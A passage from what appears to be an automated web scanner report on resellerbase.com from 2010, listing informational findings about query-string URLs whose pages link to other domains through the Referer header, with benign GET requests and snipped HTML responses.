<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.24. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2, see the request below). The response contains links to other domains: the validator.w3.org and jigsaw.w3.org badges in the site footer, which would receive the full page URL in the Referer header if followed. The response is a 404 error page, so the links come from the shared template rather than from the requested resource, and the query string carries nothing sensitive.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.25. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2, see the request below). The response contains links to other domains: the validator.w3.org and jigsaw.w3.org badges in the site footer, which would receive the full page URL in the Referer header if followed. The response is a 404 error page, so the links come from the shared template rather than from the requested resource, and the query string carries nothing sensitive.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.26. http://www.resellerbase.com/adult/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2, see the request below). The response contains links to other domains: the validator.w3.org and jigsaw.w3.org badges in the site footer, which would receive the full page URL in the Referer header if followed. The response is a 404 error page, so the links come from the shared template rather than from the requested resource, and the query string carries nothing sensitive.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.27. http://www.resellerbase.com/adult/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2, see the request below). The response contains links to other domains: the validator.w3.org and jigsaw.w3.org badges in the site footer, which would receive the full page URL in the Referer header if followed. The response is a 404 error page, so the links come from the shared template rather than from the requested resource, and the query string carries nothing sensitive.

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.28. http://www.resellerbase.com/adult/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2, see the request below). The response contains links to other domains: the validator.w3.org and jigsaw.w3.org badges in the site footer, which would receive the full page URL in the Referer header if followed. The response is a 404 error page, so the links come from the shared template rather than from the requested resource, and the query string carries nothing sensitive.

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.29. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=38, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=38 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.30. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=34, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=34 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.vod-cash.com/?id=26660"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.31. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=22, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=22 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.loveme.com/go/49557"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.32. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=36, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=36 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.nemproduction.com/?id=26660"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.33. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=16, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=16 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://worldkom.net/reseller"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.34. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=42, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=42 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.rivcash.com/?rcid=1281"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.35. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=8, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.hostcentric.com/join/index.bml?AffID=570113&amp;LinkName=ResellerBase"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.36. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=23, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.37. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (id=9, see the request below). The response contains links to other domains: the outbound URL of the listing being reported (shown in the response excerpt) and the validator.w3.org and jigsaw.w3.org badges in the footer. Following any of them sends the full page URL, query string included, to that domain in the Referer header; the id only identifies the listing, so nothing sensitive leaks.

Request

GET /bad_link.php?id=9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://partners.netapplications.com/default.aspx?affid=1640669"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.38. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=17 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.resellerclub.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.39. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.sitesinstantly.com/?bid=3617"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.40. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10017

